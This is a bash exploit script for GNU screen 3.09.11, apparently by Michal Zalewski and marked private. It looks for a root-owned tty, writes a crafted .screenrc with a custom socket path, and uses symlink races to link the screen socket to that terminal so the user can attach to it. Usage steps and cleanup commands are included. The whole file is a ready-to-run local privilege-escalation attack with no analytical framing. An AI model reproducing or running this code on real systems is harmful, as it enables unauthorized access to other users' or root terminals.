#!/bin/bash

#               **DO NOT DISTRIBUTE**
#
# A simple screen(1) exploit (tested against 3.09.11)
# - by Michal Zalewski (lcamtuf@bos.bindview.com)
# ----------------------------------------------------
# Usage: "./unscreen", then resume screen `00'.
# ----------------------------------------------------
# Ugh, blah... Should be written in C, but I don't
# really care now :)
# I haven't had time to check other versions, but see
# if this works for you too...
#
# This exploit is private, but you know that already...
#
#               **DO NOT DISTRIBUTE**
#

SCREEN=/usr/bin/screen
umask 0

if [ ! -x $SCREEN ]; then
  echo "I can't execute $SCREEN..."
  exit 0
fi

LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa

if [ -f "$LINK" ]; then
  echo "DAMN. I don't have usable pts socket available..."
  exit 0
fi

echo -ne "Finding root owned tty...\t\t"
unset TTY

for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
  if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
     TTY="$x"
     break
  fi
done

echo -n "$TTY"

if [ "$TTY" = "" ]; then
  echo -e "\nI can't find a root owned tty!"
  exit 0
fi

if [ ! -w $HOME -o ! -w /tmp ]; then
  echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
  exit 0
fi

cat >$HOME/.screenrc <<_EOF_
vbell on
defscrollback 100
autodetach on
termcapinfo  * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'
defsocketpath $LINK
_EOF_

echo -ne "\nStarting screen...\t\t\t"

$SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null &
SCPID=`echo $!`

echo -n "PID: $SCPID"

while :; do
  sleep 1
  if [ "$#" -ge "0" ]; then
    break
  fi
done

cd /tmp
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"

CNT=5   # Timeout
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
  let CNT=$CNT-1
  sleep 1
done
echo -n "Done."

echo -ne "\nLinking to root owned terminal...\t\t"
ln -fs $TTY $LINK &>/dev/null

echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."

$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null

echo -ne "\rComplete.\n"

exit 1